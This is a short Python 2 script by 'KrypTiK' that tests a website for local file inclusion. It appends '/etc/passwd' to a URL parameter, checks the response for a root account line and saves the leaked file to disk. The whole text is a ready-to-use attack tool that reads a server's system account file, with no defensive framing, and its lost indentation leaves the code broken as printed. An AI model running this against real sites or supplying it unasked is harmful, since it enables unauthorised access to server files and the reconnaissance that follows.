A small script that tests for LFI or local file inclusion vulnerability. This script is written in Python.
Written by: KrypTiK
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Made By KrypTiK
import httplib2
import urllib2
import sys
import re
print "Ex. http://127.0.0.1/index.php?page="
baseurl = raw_input("Enter a url: ")
if 'http://' not in baseurl:
baseurl = 'http://' + baseurl
url = baseurl+"/etc/passwd"
fout = raw_input("Enter output file: ")
http = httplib2.Http()
req = urllib2.Request(url)
try:
http.request(url)
except IOError:
print "URL not found!"
sys.exit()
else:
pass
response, content = http.request(url)
if response.status == 200:
if re.search("/root:/bin/bash",content):
print baseurl+" is vulnerable! (Linux)"
out = open(fout, "w")
out.write(url+"\n\n"+urllib2.urlopen(req).read())
out.close()
else:
print baseurl+" is not vulnerable!"
elif response.status == 404:
print baseurl+" was not found!"
else:
print response.status